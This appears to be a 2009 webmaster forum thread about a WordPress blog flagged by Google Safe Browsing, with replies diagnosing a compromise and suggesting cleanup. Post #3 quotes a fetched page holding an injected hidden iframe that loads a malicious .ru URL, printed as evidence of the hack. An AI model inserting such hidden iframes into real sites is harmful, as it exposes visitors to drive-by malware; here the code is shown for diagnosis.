1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Why my site is listed as suspicious in Google SafeBrowsing?

Discussion in 'Google' started by poshswinger, Sep 28, 2009.

  1. #1
    I recently checked my site at Google safebrowsing. To my surprise, Google detects that my site is listed as suspicious:

    http://safebrowsing.clients.google....refox&hl=en-US&site=http://www.apmevegas.com/

    I swear I didn't upload any malicious software into it. What may be the cause of this? How can I prevent it?

    Please give me some advices. Thank you. :)
    poshswinger, Sep 28, 2009 IP
  2. newlogo

    newlogo Banned

    Messages:
    3,937
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #2
    check in source code, if there is java script which automatic generated, clear code in site and ftp and upload again and send reinclusion request in google.
    newlogo, Sep 28, 2009 IP
  3. tattoos

    tattoos Notable Member Premium Member

    Messages:
    1,908
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    255
    #3
    "Malicious software is hosted on 1 domain(s), including agend[dot]ru"

    Do you know why agend,ru is mentioned in the report?

    Oh, I see...
    Looks like you may have been hacked... Unless that's your iframe!

    Code (Text):
    1.  
    2. http://www.rexswain.com/httpview.html
    3.  
    4. • Finding host IP address...
    5. • Host IP address = 218.213.228.76
    6. • Finding TCP protocol...
    7. • Binding to local socket...
    8. • Connecting to host...
    9. • Sending request...
    10. • Waiting for response...
    11. Receiving Header:
    12. HTTP/1.1·301·Moved·Permanently
    13. Date:·Tue,·29·Sep·2009·06:18:58·GMT
    14. Server:·Apache/2
    15. X-Powered-By:·PHP/5.2.6
    16. X-Pingback:·[url]http://apmevegas[/url][dot]com/xmlrpc[dot]php
    17. Location:·[url]http://www.apmevegas[/url][dot]com/
    18. Cache-Control:·max-age=0
    19. Expires:·Tue,·29·Sep·2009·06:18:58·GMT
    20. Vary:·Accept-Encoding,User-Agent
    21. Content-Length:·410
    22. Connection:·close
    23. Content-Type:·text/html;·charset=UTF-8
    24.  
    25. End of Header (Length = 376)
    26. • Elapsed time so far: 8 seconds
    27. • Waiting for additional response until connection closes...
    28. Total bytes received = 786
    29. Elapsed time so far: 8 seconds
    30. Content (Length = 410):
    31.  
    32. <div·style="display:none"></div>
    33. <div·style="display:none"></div>
    34. <div·style="display:none"></div>
    35. <div·style="display:none"></div>
    36. <div·style="display:none"></div>
    37. <div·style="display:none"></div>
    38. <div·style="display:none"></div>
    39. <div·style="display:none"></div>
    40. <div·style="display:none"></div>
    41. <div·style="display:none"><iframe·width=277·height=497·src="http://on-liffe[dot]ru:8080/index.php"·></iframe></div>
    42. Done
    Cheers
    James
    tattoos, Sep 28, 2009 IP
  4. newwebseo

    newwebseo Member

    Messages:
    270
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    28
    #4
    Yes it gives this warning when there is some kind of virus on your site, after you clean it up, submit review request through Google Webmaster Tools for removal of that warning in Google Search Results.
    newwebseo, Sep 28, 2009 IP
  5. poshswinger

    poshswinger Active Member

    Messages:
    2,522
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #5
    Do you have any idea why this iFrame appears in my blog source code? How can I get hacked? Is it due to Wordpress problem?

    How do I remove that? Should I simply remove the iFrame code?

    How can I prevent this thing from happening?

    Thank you. :)

    poshswinger, Sep 28, 2009 IP
  6. facerec

    facerec Peon

    Messages:
    275
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Hey..
    can someone tell me.. How can I check this for my site??
    thanx
    facerec, Sep 29, 2009 IP
  7. tattoos

    tattoos Notable Member Premium Member

    Messages:
    1,908
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    255
    #7
    I don't think removing the iframe will be enough, you will need to find out how they were able to get in and fix it so it doesn't happen again.
    There may be a vulnerability in wordpress itself, or one of the plugins you have installed on you blog. Check to make sure you have all the latest updates. It would probably be best to ask in the wordpress section. (I have no idea about it/never used it)

    Safe Browsing diagnostic tool

    Hope that helps.

    Cheers
    James
    tattoos, Sep 29, 2009 IP
  8. bryanon

    bryanon Active Member

    Messages:
    807
    Likes Received:
    29
    Best Answers:
    0
    Trophy Points:
    95
    #8
    +1 to everything that James said but do change all your passwords related to this blog/server before (and perhaps after as well - in case everything you do is currently monitored by the hacker) doing all that.
    bryanon, Sep 29, 2009 IP
  9. poshswinger

    poshswinger Active Member

    Messages:
    2,522
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #9
    Nearly all of the blogs hosted in that web hosting are having the same problem with that iFrame added, but where (while file) can I find this iFrame code and delete such malicious code?
    poshswinger, Sep 29, 2009 IP
  10. tattoos

    tattoos Notable Member Premium Member

    Messages:
    1,908
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    255
    #10
    I would highly suggest you go have a look around over here.
    If you can't find the answer using the search, then ask.

    Hope that helps.

    Cheers
    James
    tattoos, Sep 29, 2009 IP
  11. thewebhostingdir

    thewebhostingdir Well-Known Member

    Messages:
    3,797
    Likes Received:
    82
    Best Answers:
    0
    Trophy Points:
    100
    #11
    check the FTP logs of your server to find out how the iframe codes were inserted.
    thewebhostingdir, Sep 29, 2009 IP
  12. poshswinger

    poshswinger Active Member

    Messages:
    2,522
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #12
    But any more advices on how can I prevent this from happening?

    Also, how can I let my site to get indexed again in Google?
    poshswinger, Sep 30, 2009 IP